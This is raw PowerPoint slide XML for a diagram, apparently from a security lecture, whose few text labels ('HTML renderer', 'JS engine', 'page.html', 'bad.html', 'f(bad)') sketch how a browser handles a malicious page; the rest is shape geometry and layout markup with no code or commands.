        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6102351" y="6237312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fld id="{3E61BF67-ACF3-4BC0-8580-DE31188868CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:t>97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erikpoll\Desktop\.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1FD8DA0-BA9B-57F1-4AC8-DA4BA354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6" y="1923256"/>
            <a:ext cx="641146" cy="689386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9561050-BADC-1AF1-03FD-83B6720F06B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1963309" y="2121201"/>
            <a:ext cx="3784394" cy="2459927"/>
            <a:chOff x="1577979" y="5294536"/>
            <a:chExt cx="1460196" cy="1180806"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1873FED-9040-6405-98B1-0527FDB8D53D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1577979" y="5308538"/>
              <a:ext cx="1457270" cy="1166804"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4817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Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F1FB2B-ADDE-4E49-5E4A-8693DB13EFE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1577979" y="5294536"/>
              <a:ext cx="1460196" cy="132715"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4817"/>
              </a:avLst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425A438-7B90-4173-18C7-F917717DAB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2092858" y="4031155"/>
            <a:ext cx="1709310" cy="414720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88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HTML renderer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12933-E1DC-1A70-44CD-A9E9FB143FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4511766" y="3408692"/>
            <a:ext cx="1190436" cy="414720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JS engine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67BD13-9F06-D5C1-CEF2-5E8DA771732C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4635762" y="2621375"/>
            <a:ext cx="911598" cy="667047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f(bad)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B8752D8D-3800-CCD4-B698-5FF3E7B64AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126356" y="2432400"/>
            <a:ext cx="103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A496B6C1-3D63-0A25-0FE0-334E874EB18E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796287" y="2348226"/>
            <a:ext cx="122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page.html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795E39-65EF-152E-52BC-74C99966478A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2090917" y="2580457"/>
            <a:ext cx="1542353" cy="1303269"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88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page.html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03806EE4-CA90-307C-CAAC-FB88945F709D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20484043">
            <a:off x="3595713" y="2578796"/>
            <a:ext cx="120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f(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bad)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geronde rechthoek 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D11D80D-2D0B-4BBB-7505-A6C2BE0331B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7235774" y="1944213"/>
            <a:ext cx="1338922" cy="1146581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48" name="Right Arrow 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2374DA66-D46B-F125-6D94-1B8A2D41C726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20833229" flipH="1">
            <a:off x="6047199" y="2680063"/>
            <a:ext cx="1107933" cy="3070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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AB6953F-357D-F09C-4A3B-8B9AC7A5AAF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3531385" y="3673372"/>
            <a:ext cx="108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bad.html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BE11888D-C5A1-A5DD-F322-0A7A0BCD3F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1602807">
            <a:off x="1326942" y="2418716"/>
            <a:ext cx="905257" cy="216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F38490-EE39-4275-43FF-FED700AD40AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20487307" flipH="1">
            <a:off x="3663067" y="2942933"/>
            <a:ext cx="768255" cy="307098"/>
            <a:chOff x="4232999" y="3728584"/>
            <a:chExt cx="2094631" cy="338554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4B7ED47-4990-8D3E-3C72-586D47315840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4232999" y="3728584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3" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D789C3-42B7-4328-51DA-660C5F89F3DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5353340" y="3889679"/>
              <a:ext cx="624833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57021-1A42-8DDA-10CC-9918EA5A7345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20125255">
            <a:off x="3661119" y="3308771"/>
            <a:ext cx="712269" cy="307098"/>
            <a:chOff x="4438329" y="3765945"/>
            <a:chExt cx="2094631" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Right Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64FCA96-42B2-47C1-85C9-FAB10822DA2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4438329" y="3765945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9" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260B9C18-E84B-FEB8-3A6F-70A65B29ED19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1474745" flipV="1">
              <a:off x="5348894" y="3894400"/>
              <a:ext cx="507612" cy="8268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hoek 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF37638-4D1B-6EBA-2AF3-91FE11140A7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2365340" y="3357164"/>
            <a:ext cx="569713" cy="385617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f.js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9748A7-334A-1CDA-DD48-F33D60A27520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2170627" y="2742936"/>
            <a:ext cx="539361" cy="614228"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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325880 w 3226308"/>
              <a:gd name="connsiteY6" fmla="*/ 457200 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 1821180 w 3226308"/>
              <a:gd name="connsiteY7" fmla="*/ 449580 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY8" fmla="*/ 449580 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 2468880 w 3226308"/>
              <a:gd name="connsiteY9" fmla="*/ 327660 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 2781300 w 3226308"/>
              <a:gd name="connsiteY10" fmla="*/ 434340 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 3116580 w 3226308"/>
              <a:gd name="connsiteY11" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 3223260 w 3226308"/>
              <a:gd name="connsiteY12" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 3177540 w 3226308"/>
              <a:gd name="connsiteY13" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 2979420 w 3226308"/>
              <a:gd name="connsiteY14" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX15" fmla="*/ 2735580 w 3226308"/>
              <a:gd name="connsiteY15" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX16" fmla="*/ 2415540 w 3226308"/>
              <a:gd name="connsiteY16" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX17" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY17" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX18" fmla="*/ 1874520 w 3226308"/>
              <a:gd name="connsiteY18" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX19" fmla="*/ 838200 w 3226308"/>
              <a:gd name="connsiteY19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821180 w 3226308"/>
              <a:gd name="connsiteY6" fmla="*/ 449580 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY7" fmla="*/ 449580 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 2468880 w 3226308"/>
              <a:gd name="connsiteY8" fmla="*/ 327660 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 2781300 w 3226308"/>
              <a:gd name="connsiteY9" fmla="*/ 434340 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 3116580 w 3226308"/>
              <a:gd name="connsiteY10" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 3223260 w 3226308"/>
              <a:gd name="connsiteY11" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 3177540 w 3226308"/>
              <a:gd name="connsiteY12" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 2979420 w 3226308"/>
              <a:gd name="connsiteY13" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 2735580 w 3226308"/>
              <a:gd name="connsiteY14" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX15" fmla="*/ 2415540 w 3226308"/>
              <a:gd name="connsiteY15" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX16" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY16" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX17" fmla="*/ 1874520 w 3226308"/>
              <a:gd name="connsiteY17" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX18" fmla="*/ 838200 w 3226308"/>
              <a:gd name="connsiteY18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263140 w 3226308"/>
              <a:gd name="connsiteY6" fmla="*/ 449580 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 2468880 w 3226308"/>
              <a:gd name="connsiteY7" fmla="*/ 327660 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 2781300 w 3226308"/>
              <a:gd name="connsiteY8" fmla="*/ 434340 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 3116580 w 3226308"/>
              <a:gd name="connsiteY9" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 3223260 w 3226308"/>
              <a:gd name="connsiteY10" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 3177540 w 3226308"/>
              <a:gd name="connsiteY11" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 2979420 w 3226308"/>
              <a:gd name="connsiteY12" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 2735580 w 3226308"/>
              <a:gd name="connsiteY13" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 2415540 w 3226308"/>
              <a:gd name="connsiteY14" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX15" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY15" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX16" fmla="*/ 1874520 w 3226308"/>
              <a:gd name="connsiteY16" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX17" fmla="*/ 838200 w 3226308"/>
              <a:gd name="connsiteY17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468880 w 3226308"/>
              <a:gd name="connsiteY6" fmla="*/ 327660 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 2781300 w 3226308"/>
              <a:gd name="connsiteY7" fmla="*/ 434340 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 3116580 w 3226308"/>
              <a:gd name="connsiteY8" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 3223260 w 3226308"/>
              <a:gd name="connsiteY9" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 3177540 w 3226308"/>
              <a:gd name="connsiteY10" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 2979420 w 3226308"/>
              <a:gd name="connsiteY11" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 2735580 w 3226308"/>
              <a:gd name="connsiteY12" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 2415540 w 3226308"/>
              <a:gd name="connsiteY13" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY14" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX15" fmla="*/ 1874520 w 3226308"/>
              <a:gd name="connsiteY15" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX16" fmla="*/ 838200 w 3226308"/>
              <a:gd name="connsiteY16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781300 w 3226308"/>
              <a:gd name="connsiteY6" fmla="*/ 434340 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 3116580 w 3226308"/>
              <a:gd name="connsiteY7" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 3223260 w 3226308"/>
              <a:gd name="connsiteY8" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 3177540 w 3226308"/>
              <a:gd name="connsiteY9" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 2979420 w 3226308"/>
              <a:gd name="connsiteY10" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 2735580 w 3226308"/>
              <a:gd name="connsiteY11" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 2415540 w 3226308"/>
              <a:gd name="connsiteY12" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 2263140 w 3226308"/>
              <a:gd name="connsiteY13" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 1874520 w 3226308"/>
              <a:gd name="connsiteY14" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX15" fmla="*/ 838200 w 3226308"/>
              <a:gd name="connsiteY15" fmla="*/ 845820 h 925381"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3317451"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 925381"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 3317451"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 3317451"/>
              <a:gd name="connsiteY2" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX3" fmla="*/ 632460 w 3317451"/>
              <a:gd name="connsiteY3" fmla="*/ 38100 h 925381"/>
              <a:gd name="connsiteX4" fmla="*/ 838200 w 3317451"/>
              <a:gd name="connsiteY4" fmla="*/ 99060 h 925381"/>
              <a:gd name="connsiteX5" fmla="*/ 914400 w 3317451"/>
              <a:gd name="connsiteY5" fmla="*/ 358140 h 925381"/>
              <a:gd name="connsiteX6" fmla="*/ 3116580 w 3317451"/>
              <a:gd name="connsiteY6" fmla="*/ 381000 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 3223260 w 3317451"/>
              <a:gd name="connsiteY7" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 3177540 w 3317451"/>
              <a:gd name="connsiteY8" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 2979420 w 3317451"/>
              <a:gd name="connsiteY9" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 2735580 w 3317451"/>
              <a:gd name="connsiteY10" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 2415540 w 3317451"/>
              <a:gd name="connsiteY11" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 2263140 w 3317451"/>
              <a:gd name="connsiteY12" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 1874520 w 3317451"/>
              <a:gd name="connsiteY13" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX14" fmla="*/ 838200 w 3317451"/>
              <a:gd name="connsiteY14" fmla="*/ 845820 h 925381"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3388164"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 925381"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 3388164"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 3388164"/>
              <a:gd name="connsiteY2" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX3" fmla="*/ 632460 w 3388164"/>
              <a:gd name="connsiteY3" fmla="*/ 38100 h 925381"/>
              <a:gd name="connsiteX4" fmla="*/ 838200 w 3388164"/>
              <a:gd name="connsiteY4" fmla="*/ 99060 h 925381"/>
              <a:gd name="connsiteX5" fmla="*/ 914400 w 3388164"/>
              <a:gd name="connsiteY5" fmla="*/ 358140 h 925381"/>
              <a:gd name="connsiteX6" fmla="*/ 3223260 w 3388164"/>
              <a:gd name="connsiteY6" fmla="*/ 541020 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 3177540 w 3388164"/>
              <a:gd name="connsiteY7" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 2979420 w 3388164"/>
              <a:gd name="connsiteY8" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 2735580 w 3388164"/>
              <a:gd name="connsiteY9" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 2415540 w 3388164"/>
              <a:gd name="connsiteY10" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 2263140 w 3388164"/>
              <a:gd name="connsiteY11" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 1874520 w 3388164"/>
              <a:gd name="connsiteY12" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX13" fmla="*/ 838200 w 3388164"/>
              <a:gd name="connsiteY13" fmla="*/ 845820 h 925381"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3302399"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 925381"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 3302399"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 3302399"/>
              <a:gd name="connsiteY2" fmla="*/ 259080 h 925381"/>
              <a:gd name="connsiteX3" fmla="*/ 632460 w 3302399"/>
              <a:gd name="connsiteY3" fmla="*/ 38100 h 925381"/>
              <a:gd name="connsiteX4" fmla="*/ 838200 w 3302399"/>
              <a:gd name="connsiteY4" fmla="*/ 99060 h 925381"/>
              <a:gd name="connsiteX5" fmla="*/ 914400 w 3302399"/>
              <a:gd name="connsiteY5" fmla="*/ 358140 h 925381"/>
              <a:gd name="connsiteX6" fmla="*/ 3177540 w 3302399"/>
              <a:gd name="connsiteY6" fmla="*/ 769620 h 925381"/>
              <a:gd name="connsiteX7" fmla="*/ 2979420 w 3302399"/>
              <a:gd name="connsiteY7" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX8" fmla="*/ 2735580 w 3302399"/>
              <a:gd name="connsiteY8" fmla="*/ 906780 h 925381"/>
              <a:gd name="connsiteX9" fmla="*/ 2415540 w 3302399"/>
              <a:gd name="connsiteY9" fmla="*/ 746760 h 925381"/>
              <a:gd name="connsiteX10" fmla="*/ 2263140 w 3302399"/>
              <a:gd name="connsiteY10" fmla="*/ 822960 h 925381"/>
              <a:gd name="connsiteX11" fmla="*/ 1874520 w 3302399"/>
              <a:gd name="connsiteY11" fmla="*/ 861060 h 925381"/>
              <a:gd name="connsiteX12" fmla="*/ 838200 w 3302399"/>
              <a:gd name="connsiteY12" fmla="*/ 845820 h 925381"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3082630"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 954019"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 3082630"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 954019"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 3082630"/>
              <a:gd name="connsiteY2" fmla="*/ 259080 h 954019"/>
              <a:gd name="connsiteX3" fmla="*/ 632460 w 3082630"/>
              <a:gd name="connsiteY3" fmla="*/ 38100 h 954019"/>
              <a:gd name="connsiteX4" fmla="*/ 838200 w 3082630"/>
              <a:gd name="connsiteY4" fmla="*/ 99060 h 954019"/>
              <a:gd name="connsiteX5" fmla="*/ 914400 w 3082630"/>
              <a:gd name="connsiteY5" fmla="*/ 358140 h 954019"/>
              <a:gd name="connsiteX6" fmla="*/ 2979420 w 3082630"/>
              <a:gd name="connsiteY6" fmla="*/ 906780 h 954019"/>
              <a:gd name="connsiteX7" fmla="*/ 2735580 w 3082630"/>
              <a:gd name="connsiteY7" fmla="*/ 906780 h 954019"/>
              <a:gd name="connsiteX8" fmla="*/ 2415540 w 3082630"/>
              <a:gd name="connsiteY8" fmla="*/ 746760 h 954019"/>
              <a:gd name="connsiteX9" fmla="*/ 2263140 w 3082630"/>
              <a:gd name="connsiteY9" fmla="*/ 822960 h 954019"/>
              <a:gd name="connsiteX10" fmla="*/ 1874520 w 3082630"/>
              <a:gd name="connsiteY10" fmla="*/ 861060 h 954019"/>
              <a:gd name="connsiteX11" fmla="*/ 838200 w 3082630"/>
              <a:gd name="connsiteY11" fmla="*/ 845820 h 954019"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2805927"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 919111"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 2805927"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 919111"/>
              <a:gd name="connsiteX2" fmla="*/ 381000 w 2805927"/>
              <a:gd name="connsiteY2" fmla="*/ 259080 h 919111"/>
              <a:gd name="connsiteX3" fmla="*/ 632460 w 2805927"/>
              <a:gd name="connsiteY3" fmla="*/ 38100 h 919111"/>
              <a:gd name="connsiteX4" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY4" fmla="*/ 99060 h 919111"/>
              <a:gd name="connsiteX5" fmla="*/ 914400 w 2805927"/>
              <a:gd name="connsiteY5" fmla="*/ 358140 h 919111"/>
              <a:gd name="connsiteX6" fmla="*/ 2735580 w 2805927"/>
              <a:gd name="connsiteY6" fmla="*/ 906780 h 919111"/>
              <a:gd name="connsiteX7" fmla="*/ 2415540 w 2805927"/>
              <a:gd name="connsiteY7" fmla="*/ 746760 h 919111"/>
              <a:gd name="connsiteX8" fmla="*/ 2263140 w 2805927"/>
              <a:gd name="connsiteY8" fmla="*/ 822960 h 919111"/>
              <a:gd name="connsiteX9" fmla="*/ 1874520 w 2805927"/>
              <a:gd name="connsiteY9" fmla="*/ 861060 h 919111"/>
              <a:gd name="connsiteX10" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY10" fmla="*/ 845820 h 919111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632460 w 2805927"/>
              <a:gd name="connsiteY2" fmla="*/ 38100 h 919110"/>
              <a:gd name="connsiteX3" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY3" fmla="*/ 99060 h 919110"/>
              <a:gd name="connsiteX4" fmla="*/ 914400 w 2805927"/>
              <a:gd name="connsiteY4" fmla="*/ 358140 h 919110"/>
              <a:gd name="connsiteX5" fmla="*/ 2735580 w 2805927"/>
              <a:gd name="connsiteY5" fmla="*/ 906780 h 919110"/>
              <a:gd name="connsiteX6" fmla="*/ 2415540 w 2805927"/>
              <a:gd name="connsiteY6" fmla="*/ 746760 h 919110"/>
              <a:gd name="connsiteX7" fmla="*/ 2263140 w 2805927"/>
              <a:gd name="connsiteY7" fmla="*/ 822960 h 919110"/>
              <a:gd name="connsiteX8" fmla="*/ 1874520 w 2805927"/>
              <a:gd name="connsiteY8" fmla="*/ 861060 h 919110"/>
              <a:gd name="connsiteX9" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY9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838200 w 2805927"/>
              <a:gd name="connsiteY2" fmla="*/ 99060 h 919110"/>
              <a:gd name="connsiteX3" fmla="*/ 914400 w 2805927"/>
              <a:gd name="connsiteY3" fmla="*/ 358140 h 919110"/>
              <a:gd name="connsiteX4" fmla="*/ 2735580 w 2805927"/>
              <a:gd name="connsiteY4" fmla="*/ 906780 h 919110"/>
              <a:gd name="connsiteX5" fmla="*/ 2415540 w 2805927"/>
              <a:gd name="connsiteY5" fmla="*/ 746760 h 919110"/>
              <a:gd name="connsiteX6" fmla="*/ 2263140 w 2805927"/>
              <a:gd name="connsiteY6" fmla="*/ 822960 h 919110"/>
              <a:gd name="connsiteX7" fmla="*/ 1874520 w 2805927"/>
              <a:gd name="connsiteY7" fmla="*/ 861060 h 919110"/>
